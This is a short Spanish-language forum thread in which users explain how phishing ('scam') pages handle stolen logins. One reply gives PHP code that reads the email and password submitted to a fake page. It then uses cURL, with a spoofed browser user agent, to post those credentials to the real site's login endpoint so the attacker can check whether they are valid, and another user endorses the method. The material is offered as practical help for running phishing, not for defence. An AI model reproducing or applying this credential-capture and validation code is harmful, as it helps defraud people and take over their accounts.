Duda sobre Pishing (Programación)

terr0r · Julio 28, 2017, 01:19:11 AM

Buenas, siempre escucho hablar de scams con Curl o sin Curl.. alguien me puede explicar la diferencia para este tipo de ataques

Stiuvert · Julio 28, 2017, 03:36:27 AM

Hola @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta,

cURL es útil para comunicarse con muchas APIs, para automatizar peticiones y enviar datos entre servidores.

Si deseo crear un Scam e implemento cURL en ciertas funciones lo que me hará será verificar la información asignada de estos valores. Si por el contrario no lo utilizo los valores introducidos en los campos no me los validara y serán enviados por un simple POST.

Código: php

$user = $_POST[email]
$pass = $_POST[pass]

En cambio por cURL:

Código: php

$ch = curl_init('http://miweb/login.php');
$useragent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "email=$user&pass=$pass");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, "/tmp/hola.txt");

$data = curl_exec($ch);
curl_close($ch);

Saludos

blackdrake · Julio 28, 2017, 07:16:19 PM

Así es, muy bien explicado por parte de @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, resumiendo sirve para realizar vía backend una comprobación de las credenciales y saber si son correctas o no.

Un saludo.

Duda sobre Pishing (Programación)

terr0r

Julio 28, 2017, 01:19:11 AM Ultima modificación: Julio 28, 2017, 07:26:55 AM por HATI

Stiuvert

Julio 28, 2017, 03:36:27 AM #1

blackdrake

Julio 28, 2017, 07:16:19 PM #2